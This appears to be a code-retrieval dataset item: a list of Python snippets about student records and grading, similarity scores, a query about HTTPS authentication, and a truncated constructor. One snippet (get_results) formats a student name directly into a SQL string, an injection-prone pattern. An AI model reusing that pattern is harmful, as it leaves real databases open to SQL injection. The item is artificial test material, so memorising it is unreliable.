'students/{gradebookId}'\n if section_name:\n group_id, _ = self.get_section_by_name(section_name)\n if group_id is None:\n failure_message = (\n 'in get_students -- Error: '\n 'No such section %s' % section_name\n )\n log.critical(failure_message)\n raise PyLmodNoSuchSection(failure_message)\n url += '/section/{0}'.format(group_id)\n\n student_data = self.get(\n url.format(\n gradebookId=gradebook_id or self.gradebook_id\n ),\n params=params,\n )\n\n if simple:\n # just return dict with keys email, name, section\n student_map = dict(\n accountEmail='email',\n displayName='name',\n section='section'\n )\n\n def remap(students):\n \"\"\"Convert mit.edu domain to upper-case for student emails.\n\n The mit.edu domain for user email must be upper-case,\n i.e. MIT.EDU.\n\n Args:\n students (list): list of students\n\n Returns:\n dict: dictionary of updated student email domains\n \"\"\"\n newx = dict((student_map[k], students[k]) for k in student_map)\n # match certs\n newx['email'] = newx['email'].replace('@mit.edu', '@MIT.EDU')\n return newx\n\n return [remap(x) for x in student_data['data']]\n\n return student_data['data']", "def get_students(self):\n if not self.is_sorted:\n self.students.sort()\n self.is_sorted = True\n for s in self.students:\n yield s", "def get_all_grades(first_name, last_name):\n QUERY = \"\"\" SELECT s.first_name, s.last_name, g.project_title, g.grade \n FROM Students AS s \n INNER JOIN Grades AS g ON s.github = g.student_github\n WHERE s.first_name = ? AND s.last_name = ? 
\"\"\"\n db_cursor.execute(QUERY, (first_name, last_name))\n grades_data = db_cursor.fetchone()\n print grades_data[-1]", "def students(self):\n return self._parser.students", "def __ui_search_student_by_name(self, search):\n try:\n result = self.__student_controller.search_by_name(search)\n for student in result:\n print(str(student))\n\n except RepositoryException as re:\n print(re)\n return", "def roster(self) -> list:\n return [student\n for grade in sorted(self.students)\n for student in self.students[grade]]", "def allStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted = True\n # Returns each element or each student in order, as needed.\n for student in self.students:\n yield student", "def get_all_enrolled(self, discipline_id):\n students = MyCollection()\n for item in self.__student_repository.get_all():\n newID = str(discipline_id) + \".\" + str(item.entity_id)\n if not self.__link_repository.find_by_id(newID) is None:\n students.append(item)\n return students", "def get_students(self):\n dist_on_foot = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_foot')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Run, ActivityType.Walk])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n dist_on_bike = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_bike')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Ride])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n data = db.session.query(User, dist_on_foot.c.on_foot, dist_on_bike.c.on_bike). \\\n select_from(User). \\\n outerjoin(dist_on_foot, User.id == dist_on_foot.c.user_id). \\\n outerjoin(dist_on_bike, User.id == dist_on_bike.c.user_id). \\\n filter(User.type == UserType.Student). 
\\\n order_by(User.last_name.asc(), User.first_name.asc())\n\n result = []\n for row in data:\n on_foot = row.on_foot or 0\n on_bike = row.on_bike or 0\n item = {\n 'name': row.User.first_name + ' ' + row.User.last_name,\n 'uk id': row.User.uk_id,\n 'on foot': round(on_foot, 1),\n 'on bike': round(on_bike, 1),\n 'points': round(on_foot + on_bike / 2, 2)\n }\n result.append(item)\n return result", "def test_empty_student_list(self):\r\n gradeset_results = list(iterate_grades_for(self.course.id, []))\r\n self.assertEqual(gradeset_results, [])", "def get_student_grade_summary_data(request, course, get_grades=True, get_raw_scores=False, use_offline=False):\r\n course_key = course.id\r\n enrolled_students = User.objects.filter(\r\n courseenrollment__course_id=course_key,\r\n courseenrollment__is_active=1,\r\n ).prefetch_related(\"groups\").order_by('username')\r\n\r\n header = [_('ID'), _('Username'), _('Full Name'), _('edX email'), _('External email')]\r\n\r\n datatable = {'header': header, 'students': enrolled_students}\r\n data = []\r\n\r\n gtab = GradeTable()\r\n\r\n for student in enrolled_students:\r\n datarow = [student.id, student.username, student.profile.name, student.email]\r\n try:\r\n datarow.append(student.externalauthmap.external_email)\r\n except: # ExternalAuthMap.DoesNotExist\r\n datarow.append('')\r\n\r\n if get_grades:\r\n gradeset = student_grades(student, request, course, keep_raw_scores=get_raw_scores, use_offline=use_offline)\r\n log.debug('student={0}, gradeset={1}'.format(student, gradeset))\r\n with gtab.add_row(student.id) as add_grade:\r\n if get_raw_scores:\r\n # TODO (ichuang) encode Score as dict instead of as list, so score[0] -> score['earned']\r\n for score in gradeset['raw_scores']:\r\n add_grade(score.section, getattr(score, 'earned', score[0]))\r\n else:\r\n for grade_item in gradeset['section_breakdown']:\r\n add_grade(grade_item['label'], grade_item['percent'])\r\n student.grades = gtab.get_grade(student.id)\r\n\r\n data.append(datarow)\r\n\r\n # if getting grades, need to do a second pass, and add grades to each datarow;\r\n # on the first pass we don't know all the graded components\r\n if get_grades:\r\n for datarow in data:\r\n # get grades for student\r\n sgrades = gtab.get_grade(datarow[0])\r\n datarow += sgrades\r\n\r\n # get graded components and add to table header\r\n assignments = gtab.get_graded_components()\r\n header += assignments\r\n datatable['assignments'] = assignments\r\n\r\n datatable['data'] = data\r\n return datatable", "def get_sorted_students(self):\n results = self.__create_student_and_grade_dto()\n results.sort(self.__compare_dtos_on_grade)\n return results", "def __ui_search_student_by_id(self, search):\n try:\n result = self.__student_controller.search_by_id(search)\n for student in result:\n print(str(student))\n\n except RepositoryException as re:\n print(re)\n return", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n # a list of (project_title, grade) for a given student\n titles_grades = hackbright.get_grades_by_github(github)\n\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n titles_grades=titles_grades)\n\n return html", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n rows = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n 
rows=rows)\n # return html", "def test_only_students_courses(self):\n user = self.make_user()\n enrollment = EnrollmentFactory(grade_level__school_year__school=user.school)\n course = CourseFactory(grade_levels=[enrollment.grade_level])\n grade = GradeFactory(\n score=50,\n student=enrollment.student,\n graded_work__course_task__course=course,\n )\n grade_2 = GradeFactory(\n score=100,\n student=enrollment.student,\n graded_work__course_task__course=course,\n )\n GradeFactory(\n graded_work__course_task__course__grade_levels=[enrollment.grade_level]\n )\n\n with self.login(user):\n self.get_check_200(\"reports:progress\", pk=enrollment.id)\n\n assert self.get_context(\"courses\") == [\n {\n \"course\": grade.graded_work.course_task.course,\n \"grades\": [grade, grade_2],\n \"course_average\": 75,\n }\n ]", "def add_grade(self, student, grade):\n try:\n self.grades[student.id].append(grade)\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def addGrade(self, student, grade):\n try:\n self.grades[student.getIDNumber()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def get_students(user):\n students = Student.query(ancestor=get_parent_key(user)).order(Student.rose_username).fetch()\n students_map = {}\n teams = []\n for student in students:\n students_map[student.key] = student\n if student.team not in teams:\n teams.append(student.team)\n return students, students_map, teams", "def select_all_students(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM student\")\n\n rows = cur.fetchall()\n\n return rows # return the rows", "def get_all_students(hospital_codes, results_codes):\n data = pd.read_csv(\"res/Internship Lottery_April 8, 2018_11.54_correct encoding.csv\", encoding='iso-8859-8')\n students = []\n for i in range(2, 241):\n student = get_student(i + 2, data.iloc[i], hospital_codes, results_codes)\n if student is not None:\n students.append(student)\n\n return students", "def print_grades(grades_input):\n for grade in grades_input:\n print grade", "def search_student(student):\n result=[]\n for name,age in alumnos.items():\n if student.lower() in name.lower():\n result.append(name)\n\n print(f\"Result {result}\")\n return result", "def pass_assign_for_student(cls):\n today = datetime.date.today()\n assignments_list = Assignment.query.filter(Assignment.START_DATA <= today).all()\n return assignments_list", "def getStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted = True\n return self.students[:] #return copy of list of students", "def gr_s(gr):\r\n c.execute(\"SELECT * FROM personnel WHERE grade=:grade COLLATE NOCASE\", {'grade': gr})\r\n return c.fetchall()", "def student_pins_in_semester(cls, student: Student, semester: Semester) -> Iterable[Group]:\n pins = cls.objects.filter(\n group__course__semester_id=semester.pk, student_id=student.pk).select_related(\n 'group__course', 'group__teacher', 'group__teacher__user')\n return map(lambda p: p.group, pins)", "def get_matching_pay_grades(self, role, **kwargs):\n return super(KitchenPayGradeManager, self).get_matching_pay_grades(\n **kwargs).filter(role=role)", "def get_average_grade_of_students(students):\n total_grade = 0\n for row in students:\n total_grade += int(row[5])\n return total_grade/len(students)", "def add_grades(self, request, pk=None):\n\n instance = self.get_object()\n try:\n user = self.request.user\n query = models.StudentSubject.objects.filter(\n subject__teacher__user=user,\n subject=instance\n )\n serializer = 
self.get_serializer(query, many=True)\n \n id = self.request.query_params.get('id')\n\n if id:\n q = get_object_or_404(\n models.StudentSubject,\n pk=id,\n subject=instance\n )\n return self.filtering(request, q)\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n project_list = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n project_list=project_list)", "def func_Q1(db):\n grades_collection = db.grades\n student_list = list(grades_collection.distinct(\"student_id\", {}))\n\n return len(student_list)", "def view_student_gradebook():\n\n user_id = session.get('user_id')\n courses = []\n grades = []\n con = db.get_db()\n cur = con.cursor()\n\n cur.execute(\"\"\"SELECT DISTINCT courses.course_id, (ROUND(sum(grades.points_received)/sum(grades.total_points), 2 )*100)\n as total_grade, roster.session_id as class_session,\n courses.name as class_name, users.name AS teacher_name, grades.student_id\n FROM courses JOIN sessions on courses.course_id = sessions.course_id\n\t\t\t\t JOIN users on courses.teacherid= users.id\n JOIN assignments on assignments.session_id = sessions.id\n JOIN grades on grades.assignment_id = assignments.assignment_id\n JOIN roster on roster.session_id = sessions.id\n WHERE grades.student_id = %s\n\t GROUP BY grades.student_id, roster.session_id, courses.course_id, users.id\"\"\",\n (user_id,))\n courses = cur.fetchall()\n\n cur.close()\n con.close()\n\n return render_template(\"/layouts/gradebook/student_view.html\", courses=courses)", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n title_grade_list = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n title_grade_list=title_grade_list)\n\n return html", "def student_grade(github, project_title):\n\n QUERY= \"\"\"SELECT grade\n FROM Grades \n WHERE student_github = ? 
AND project_title = ?\"\"\"\n \n\n db_cursor.execute(QUERY, (github, project_title))\n\n grade_value = db_cursor.fetchone()\n\n print \"%s's grade for %s: %s\" % (github, project_title, grade_value)", "def get_grades(session): \n res = _get_grades_step_0(session)\n dossier_path = re.search('href=\"([\\/a-zA-Z0-9\\.]*)\" title=\"Mon dossier\"', res).group(1)\n\n print(\"[STEP 0] got dossier path: \" + dossier_path)\n\n res = _get_grades_step_1(session, dossier_path)\n\n # Get the list of years available (1A, 2A, 3A) and their identifiers\n res = _get_grades_step_2(session)\n rgx = re.finditer(r'''<u>([A-Z\\/0-9]*)<\\/u><\\/a><\\/td><td width=\"30%\"><a href=\"#\" onclick=\"return oamSubmitForm\\('([a-zA-Z0-9_]*)','([a-zA-Z0-9_:]*)',null,\\[\\['row','([0-9]*)'\\]\\]\\);\" id=\"([a-zA-Z0-9_:]*)\">([a-zA-Z0-9 ]*)<\\/a>''', res)\n\n years = []\n for match in rgx:\n years.append({\n \"id\": match.group(1),\n \"name\": match.group(6),\n \"param\": match.group(2),\n \"paramval\": match.group(5),\n \"row\": match.group(4)\n })\n\n print(\"[STEP 2] got years:\", years)\n\n year_grades = []\n for year in years:\n res = _get_grades_step_3(session, year)\n\n soup = BeautifulSoup(res, 'html.parser')\n table = soup.find('table', attrs={'class':'portlet-table'})\n table_body = table.find('tbody')\n rows = table_body.find_all('tr')\n\n rawgrades = []\n for row in rows:\n cols = row.find_all('td')\n cols = [ele.text.strip() for ele in cols]\n\n data = []\n for ele in cols:\n if ele:\n data.append(ele)\n\n rawgrades.append(data)\n\n grades = []\n gradergx = re.compile('^[0-9]{1,2}$')\n for line in rawgrades:\n if len(line) == 3 and gradergx.match(line[2]):\n grades.append({\n \"module_code\": line[0],\n \"module_name\": line[1],\n \"module_grade\": int(line[2])\n })\n\n print(\"[STEP 3] got {nb} modules with grades for year {year}\".format(\n nb=len(grades), year=year['name']))\n\n year_grades.append({\n 'year':{'id': year['id'], 'label': year['name']},\n 'grades': grades,\n 'raw': rawgrades\n })\n\n return year_grades", "def get_results(self, stud_name):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\n \"SELECT c.naam, e.cijfer, e.ex_datum \"\n \"FROM studenten s \"\n \"INNER JOIN examens e ON e.stud_id = s.stud_id \"\n \"INNER JOIN cursussen c ON c.cur_id = e.cur_id WHERE s.naam = '{0}' \"\n \"ORDER BY e.ex_datum DESC\".format(stud_name))\n self.cur.close()\n\n return self.cur.fetchall()", "def grade_report(course):\n report = []\n for st in course.get_students():\n try:\n average = sum(course.get_grades(st)) / len(course.get_grades(st))\n report.append(str(st) + '\\'s mean grade is: ' + str(average) + '.')\n except ZeroDivisionError:\n report.append(str(st) + ' has no grades.')\n return '\\n'.join(report)", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n grades = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n grades=grades)\n\n return html", "def canvas_api_section_students(state, course_id, section_id):\n\n api = state.canvas_api()\n for student in api.list_section_students(course_id, section_id):\n click.echo(str(student))", "def all_instructors(self):\n \n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Instructor(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.first_name,\n i.Last_name,\n 
i.slack_handle,\n i.cohort_id,\n c.name\n from instructors i\n join cohorts c on i.cohort_id = c.id\n order by i.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Instructors***')\n\n for student in all_students:\n print(student)", "def _create_students_with_state(self, num_students, state=None, grade=0, max_grade=1):\r\n self.define_option_problem(PROBLEM_URL_NAME)\r\n students = [\r\n UserFactory.create(username='robot%d' % i, email='robot+test+%d@edx.org' % i)\r\n for i in xrange(num_students)\r\n ]\r\n for student in students:\r\n CourseEnrollmentFactory.create(course_id=self.course.id, user=student)\r\n StudentModuleFactory.create(course_id=self.course.id,\r\n module_state_key=self.location,\r\n student=student,\r\n grade=grade,\r\n max_grade=max_grade,\r\n state=state)\r\n return students", "def all_instructors(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Instructor(\n row[1], row[2], row[6], row[6], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.FirstName,\n i.LastName,\n i.SlackHandle,\n i.CohortId,\n i.Specialty,\n c.Name\n from Instructor i\n join Cohort c on i.CohortId = c.Id\n order by i.CohortId\n \"\"\")\n\n all_instructors = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for instructor in all_instructors:\n print(instructor)", "async def get_exams(\n self, last_sync: datetime = None, deleted=False, **kwargs\n ) -> Union[AsyncIterator[Grade], List[int]]:\n return Exam.get(self._api, last_sync, deleted, **kwargs)", "def search(page, query, paginator=None, students=None, offset=None):\n form = SearchForm()\n if form.validate_on_submit():\n student = db.get_table('student')\n total = student.count(form.name.data)\n page = 1\n paginator = Paginator(page, PER_PAGE, total)\n students = student.search(form.name.data, offset, PER_PAGE)\n query = form.name.data\n elif query is not None:\n student = db.get_table('student')\n total = student.count(query)\n paginator = Paginator(page, PER_PAGE, total)\n if page != 1:\n offset = PER_PAGE * paginator.previous\n students = student.search(query, offset, PER_PAGE)\n return render_template(\n 'search.html', students=students,\n form=form, paginator=paginator, query=query\n )", "def Students_in_class(l:list,d:str,c:str)->list:\n result=[]\n for s in l:\n if Student_is_enrolled(s,d,c):\n result.append(s)\n return result", "def gradeReport(course):\n report = []\n for student in course.allStudents():\n total = 0.0\n numberOfGrades = 0\n for grade in course.getGrades(student):\n total += grade\n numberOfGrades += 1\n \n try:\n average = total / numberOfGrades\n report.append(str(student) + \"'s mean grade is \" + str(average))\n except ZeroDivisionError:\n report.append(str(student) + \" has no grades\")\n \n return '\\n'.join(report)", "def select_all_students(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM students\")\n\n rows = cur.fetchall()\n print(rows)\n for row in rows:\n print(row)", "def grades(self) -> List[int]:\n\n return grades_present(self, _eps)", "def searchByYear(database):\n year=int(input(\"What is his year of study :\"))\n usrs,find=getByYear(database,year)\n for usr in usrs:\n print(usr)", "def get_all_student_courses(cls, user):\n member_record = 
CourseMember.objects.filter(user=user)\n member_teacher = member_record.filter(type = 3)\n student_list = []\n\n for member in member_teacher:\n if member.course.pk not in student_list:\n student_list.append(member.course.pk)\n\n return student_list", "def get_student(self):\n return db.get(self.student_key)", "def _getStudentEntries(self, program_entity, student_entity,\n params, id, user, prefix):\n\n items = []\n\n timeline_entity = program_entity.timeline\n\n if timeline_helper.isAfterEvent(timeline_entity,\n 'student_signup_start'):\n # add a link to show all projects\n items += [(ghop_redirects.getListStudentTasksRedirect(\n program_entity, {'url_name':'ghop/student'}),\n \"List my Tasks\", 'any_access')]\n\n items += super(View, self)._getStudentEntries(program_entity,\n student_entity, params, id, user, prefix)\n\n return items", "def get_class_grades(class_id):\n\n grades = []\n quiz_grades = query_db(\n \"SELECT people.name, quizzes.name, grade FROM quiz_grades JOIN people \"\n \"ON quiz_grades.student_id=people.id JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE classes.id=?;\",\n [class_id],\n )\n for grade in quiz_grades:\n grade_class = {}\n grade_class[\"student_name\"] = grade[0]\n grade_class[\"thing_name\"] = str(grade[1]) + \" (Quiz)\"\n grade_class[\"grade\"] = grade[2]\n grades.append(grade_class)\n assignment_grades = query_db(\n \"SELECT people.name, assignments.name, grade FROM assignment_grades \"\n \"JOIN people ON assignment_grades.student_id=people.id \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics ON assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE classes.id=?;\",\n [class_id],\n )\n for grade in assignment_grades:\n grade_assign = {}\n grade_assign[\"student_name\"] = grade[0]\n grade_assign[\"thing_name\"] = str(grade[1]) + \" (Assignment)\"\n grade_assign[\"grade\"] = grade[2]\n grades.append(grade_assign)\n return grades", "def get_student_classes():\n class_data = query_db(\n \"SELECT classes.id, classes.name FROM classes JOIN roster \"\n \"ON roster.class_id = classes.id where people_id=?;\",\n [flask.session[\"id\"]],\n )\n classes = []\n for class_info in class_data:\n student_class = {}\n student_class[\"id\"] = class_info[0]\n student_class[\"name\"] = class_info[1]\n classes.append(student_class)\n return classes", "def score_list_student(request):\n\n takes = Take.objects.filter(student__username=request.data[\"sid\"])\n serializer = TakeSerializer(takes, many=True)\n return Response(serializer.data)", "def assignment_get_grades(assignment, section_id=None, problem=None):\n\tif problem:\n\t\treturn assignment_get_problem_grades(problem, section_id)\n\n\tif section_id:\n\t\tsection_users = db((db.sections.id==db.section_users.section) & (db.auth_user.id==db.section_users.auth_user))\n\t\tusers = section_users(db.auth_user.course_id == assignment.course)\n\t\tusers = users(db.sections.id == section_id)\n\telse:\n\t\tusers = db(db.auth_user.course_id == assignment.course)\n\tusers = users.select(\n\t\tdb.auth_user.ALL,\n\t\torderby = db.auth_user.last_name,\n\t\t)\n\tgrades = db(db.grades.assignment == assignment.id)\n\tgrades = grades.select(db.grades.ALL)\n\tfor u in users:\n\t\tu.grade = None\n\t\tu.comment = \"\"\n\t\tfor g in grades:\n\t\t\tif g.auth_user.id == u.id:\n\t\t\t\tu.grade = g.score\n\treturn users", "def _grade(student, request, course, 
keep_raw_scores):\r\n grading_context = course.grading_context\r\n raw_scores = []\r\n\r\n # Dict of item_ids -> (earned, possible) point tuples. This *only* grabs\r\n # scores that were registered with the submissions API, which for the moment\r\n # means only openassessment (edx-ora2)\r\n submissions_scores = sub_api.get_scores(\r\n course.id.to_deprecated_string(), anonymous_id_for_user(student, course.id)\r\n )\r\n\r\n totaled_scores = {}\r\n # This next complicated loop is just to collect the totaled_scores, which is\r\n # passed to the grader\r\n for section_format, sections in grading_context['graded_sections'].iteritems():\r\n format_scores = []\r\n for section in sections:\r\n section_descriptor = section['section_descriptor']\r\n section_name = section_descriptor.display_name_with_default\r\n\r\n # some problems have state that is updated independently of interaction\r\n # with the LMS, so they need to always be scored. (E.g. foldit.,\r\n # combinedopenended)\r\n should_grade_section = any(\r\n descriptor.always_recalculate_grades for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n # If there are no problems that always have to be regraded, check to\r\n # see if any of our locations are in the scores from the submissions\r\n # API. If scores exist, we have to calculate grades for this section.\r\n if not should_grade_section:\r\n should_grade_section = any(\r\n descriptor.location.to_deprecated_string() in submissions_scores\r\n for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n if not should_grade_section:\r\n with manual_transaction():\r\n should_grade_section = StudentModule.objects.filter(\r\n student=student,\r\n module_state_key__in=[\r\n descriptor.location for descriptor in section['xmoduledescriptors']\r\n ]\r\n ).exists()\r\n\r\n # If we haven't seen a single problem in the section, we don't have\r\n # to grade it at all! We can assume 0%\r\n if should_grade_section:\r\n scores = []\r\n\r\n def create_module(descriptor):\r\n '''creates an XModule instance given a descriptor'''\r\n # TODO: We need the request to pass into here. If we could forego that, our arguments\r\n # would be simpler\r\n with manual_transaction():\r\n field_data_cache = FieldDataCache([descriptor], course.id, student)\r\n return get_module_for_descriptor(student, request, descriptor, field_data_cache, course.id)\r\n\r\n for module_descriptor in yield_dynamic_descriptor_descendents(section_descriptor, create_module):\r\n\r\n (correct, total) = get_score(\r\n course.id, student, module_descriptor, create_module, scores_cache=submissions_scores\r\n )\r\n if correct is None and total is None:\r\n continue\r\n\r\n if settings.GENERATE_PROFILE_SCORES: \t# for debugging!\r\n if total > 1:\r\n correct = random.randrange(max(total - 2, 1), total + 1)\r\n else:\r\n correct = total\r\n\r\n graded = module_descriptor.graded\r\n if not total > 0:\r\n #We simply cannot grade a problem that is 12/0, because we might need it as a percentage\r\n graded = False\r\n\r\n scores.append(Score(correct, total, graded, module_descriptor.display_name_with_default))\r\n\r\n _, graded_total = graders.aggregate_scores(scores, section_name)\r\n if keep_raw_scores:\r\n raw_scores += scores\r\n else:\r\n graded_total = Score(0.0, 1.0, True, section_name)\r\n\r\n #Add the graded total to totaled_scores\r\n if graded_total.possible > 0:\r\n format_scores.append(graded_total)\r\n else:\r\n log.exception(\"Unable to grade a section with a total possible score of zero. 
\" +\r\n str(section_descriptor.location))\r\n\r\n totaled_scores[section_format] = format_scores\r\n\r\n grade_summary = course.grader.grade(totaled_scores, generate_random_scores=settings.GENERATE_PROFILE_SCORES)\r\n\r\n # We round the grade here, to make sure that the grade is an whole percentage and\r\n # doesn't get displayed differently than it gets grades\r\n grade_summary['percent'] = round(grade_summary['percent'] * 100 + 0.05) / 100\r\n\r\n letter_grade = grade_for_percentage(course.grade_cutoffs, grade_summary['percent'])\r\n grade_summary['grade'] = letter_grade\r\n grade_summary['totaled_scores'] = totaled_scores \t# make this available, eg for instructor download & debugging\r\n if keep_raw_scores:\r\n grade_summary['raw_scores'] = raw_scores # way to get all RAW scores out to instructor\r\n # so grader can be double-checked\r\n return grade_summary", "def get_students_problem_grades(request, csv=False):\r\n module_state_key = Location.from_deprecated_string(request.GET.get('module_id'))\r\n csv = request.GET.get('csv')\r\n\r\n # Query for \"problem grades\" students\r\n students = models.StudentModule.objects.select_related('student').filter(\r\n module_state_key=module_state_key,\r\n module_type__exact='problem',\r\n grade__isnull=False,\r\n ).values('student__username', 'student__profile__name', 'grade', 'max_grade').order_by('student__profile__name')\r\n\r\n results = []\r\n if not csv:\r\n # Restrict screen list length\r\n # Adding 1 so can tell if list is larger than MAX_SCREEN_LIST_LENGTH\r\n # without doing another select.\r\n for student in students[0:MAX_SCREEN_LIST_LENGTH + 1]:\r\n student_dict = {\r\n 'name': student['student__profile__name'],\r\n 'username': student['student__username'],\r\n 'grade': student['grade'],\r\n }\r\n\r\n student_dict['percent'] = 0\r\n if student['max_grade'] > 0:\r\n student_dict['percent'] = round(student['grade'] * 100 / student['max_grade'])\r\n results.append(student_dict)\r\n\r\n max_exceeded = False\r\n if len(results) > MAX_SCREEN_LIST_LENGTH:\r\n # Remove the last item so list length is exactly MAX_SCREEN_LIST_LENGTH\r\n del results[-1]\r\n max_exceeded = True\r\n\r\n response_payload = {\r\n 'results': results,\r\n 'max_exceeded': max_exceeded,\r\n }\r\n return JsonResponse(response_payload)\r\n else:\r\n tooltip = request.GET.get('tooltip')\r\n filename = sanitize_filename(tooltip[:tooltip.rfind(' - ')])\r\n\r\n header = [_(\"Name\").encode('utf-8'), _(\"Username\").encode('utf-8'), _(\"Grade\").encode('utf-8'), _(\"Percent\").encode('utf-8')]\r\n for student in students:\r\n\r\n percent = 0\r\n if student['max_grade'] > 0:\r\n percent = round(student['grade'] * 100 / student['max_grade'])\r\n results.append([student['student__profile__name'], student['student__username'], student['grade'], percent])\r\n\r\n response = create_csv_response(filename, header, results)\r\n return response", "def add_students() -> None:\r\n faculties = [\"Computer Science\", \"Performing Arts\", \"Engineering\", \"Economics\"]\r\n for faculty in faculties:\r\n for _ in range(50):\r\n create_student(faculty)", "def grade(student, request, course, keep_raw_scores=False):\r\n with manual_transaction():\r\n return _grade(student, request, course, keep_raw_scores)", "def get_enrollments(search: dict) -> list:\n query = session.query(Enrollment)\n for attr, value in search.items():\n query = query.filter(getattr(Enrollment, attr) == value)\n\n return list(map(lambda o: o.asdict(), query.all()))", "def create_students():\n\n\t# create empty 
list\n\tstudent_list = []\n\n\t# import student classces\n\tstudent_list = create_student_class()\n\n\treturn student_list", "def find_student(self):\n opt = self.input_options(['id', 'name'], 1, 'How do you want to find the student?')\n if opt.upper() == 'ID':\n id = self.input_id(1, \"Input ID of Student You're Looking for\")\n return self.student_list[self.student_list.id == id]\n else:\n name = self.input_name(1, \"Input Name of Student You're Looking for\")\n return self.student_list[self.student_list.name == name]", "def list(self, request):\n queryset = Students.objects.filter(average_rating=5.0)\n students = normalize_students(queryset)\n return Response(students)", "def students_data():\n\n return [\n {'name': 'Alexey', 'rate': 2, 'course': 'Python'},\n {'name': 'Vali', 'rate': 5, 'course': 'Java'},\n {'name': 'Olga', 'rate': 4, 'course': 'Python'},\n {'name': 'Frank', 'rate': 5, 'course': 'Python'},\n {'name': 'Masha', 'rate': 3, 'course': 'Java'},\n {'name': 'Vasily', 'rate': 2, 'course': 'Java'},\n {'name': 'Daria', 'rate': 3, 'course': 'Python'},\n {'name': 'Nickname', 'rate': 4, 'course': 'Python'},\n {'name': 'Fort', 'rate': 3, 'course': 'Java'},\n {'name': 'Lama', 'rate': 4, 'course': 'Java'},\n {'name': 'Pop', 'rate': 2, 'course': 'Python'},\n {'name': 'Sort', 'rate': 3, 'course': 'Python'},\n {'name': 'Elya', 'rate': 5, 'course': 'Java'},\n {'name': 'Tolik', 'rate': 4, 'course': 'Python'},\n ]", "def __statistics_best_situation(self):\n students_list = self.__grade_controller.get_list_of_students_with_best_situation()\n if len(students_list) == 0:\n print(\"There is no student with a grade!\")\n return\n\n for student in students_list:\n print(str(student) + \"\\n\")" ]
[ "0.772303", "0.6642984", "0.6595034", "0.6356183", "0.6333465", "0.62915266", "0.6277043", "0.62721986", "0.6257745", "0.6209728", "0.62009317", "0.61742765", "0.6173197", "0.61293", "0.6112251", "0.6028895", "0.60229445", "0.5965616", "0.5958776", "0.5954945", "0.58713627", "0.58664083", "0.58186996", "0.58093935", "0.5804742", "0.5800359", "0.57900953", "0.5776054", "0.5774096", "0.57500577", "0.5746148", "0.57353926", "0.57258326", "0.5694339", "0.56892776", "0.5629637", "0.56162107", "0.56045175", "0.55817944", "0.55792797", "0.55306065", "0.5501799", "0.54942715", "0.54820216", "0.54514486", "0.5424794", "0.5424623", "0.5388939", "0.5377183", "0.53716606", "0.5360393", "0.5353907", "0.53489065", "0.5339543", "0.53338534", "0.5320768", "0.5303557", "0.5297388", "0.5293609", "0.52772844", "0.52688193", "0.5264621", "0.52633417", "0.52473605", "0.5232123", "0.5226952", "0.5209384", "0.51989657", "0.51898706", "0.51664203", "0.51601535", "0.5157177", "0.515066", "0.51416713", "0.5135563", "0.51124305", "0.5101858", "0.5084936", "0.5079615", "0.50687057", "0.5044918", "0.50432754", "0.5026796", "0.5026379", "0.5020609", "0.5006079", "0.49976906", "0.49975038", "0.49962196", "0.49921033", "0.49888647", "0.49882382", "0.49825698", "0.4972432", "0.4969226", "0.49685147", "0.49652955", "0.49556622", "0.49556142", "0.49400285" ]
0.64473695
3
If username and password are not provided, the HTTPS request will not send authentication headers
def __init__(self, server, ssl=True, username=None, password=None):
    self.server = server
    # Only build the Authorization header when both credentials are given;
    # the original built it unconditionally, raising TypeError on None.
    if username and password:
